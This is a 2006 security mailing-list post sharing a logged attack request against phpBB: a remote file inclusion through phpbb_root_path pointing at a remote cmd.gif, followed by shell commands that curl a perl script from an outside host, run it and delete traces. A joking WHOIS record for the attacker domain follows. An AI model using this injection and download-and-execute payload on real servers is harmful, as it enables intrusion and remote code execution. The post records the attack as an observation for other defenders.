[funsec] I DONT HACK :-)
Peter Kosinar
goober at nuf.ksp.sk
Sat Sep 16 14:49:05 CDT 2006
Found a nice request in some of my logs recently (split into several lines
in feeble attempt to improve readability):
<somewhere>/modules/Forums/admin/admin_ug_auth.php?
phpbb_root_path=http://paradoxgaming.com/cmd.gif?&cmd=
cd%20/tmp;
mkdir%20.abc;
curl%20-o%20perl.gif%20http://paradoxgaming.com/perl.gif;
perl%20perl.gif;
rm%20-rf%20perl.gif;
rm%20perl.gif;
cd%20..;
rm%20-rf%20.abc;
^^^ = "sec" VVV = "fun"
---- WHOIS for paradoxgaming.com:
Domain Name.......... paradoxgaming.com
Creation Date........ 2005-12-16
Registration Date.... 2005-12-16
Expiry Date.......... 2006-12-16
Organisation Name.... I DONT HACK
Organisation Address. 123 Fake Street
Organisation Address.
Organisation Address. Springfield
Organisation Address. 3141
Organisation Address. Antarctica
Organisation Address. AUSTRALIA
Admin Name........... I DONT HACK
Admin Address........ 123 Fake Street
Admin Address........
Admin Address........ Springfield
Admin Address........ 3141
Admin Address........ Antarctica
Admin Address........ AUSTRALIA
Admin Email.......... idhhaha at gmail.com
Admin Phone.......... +61.400440033
Admin Fax............
----
Peter
PS. Yes, I know the guy is most likely not -hacking-, he's probably been
-hacked-... Though, one never knows :-)
--
[Name] Peter Kosinar [Quote] 2B | ~2B = exp(i*PI) [ICQ] 134813278
More information about the funsec
mailing list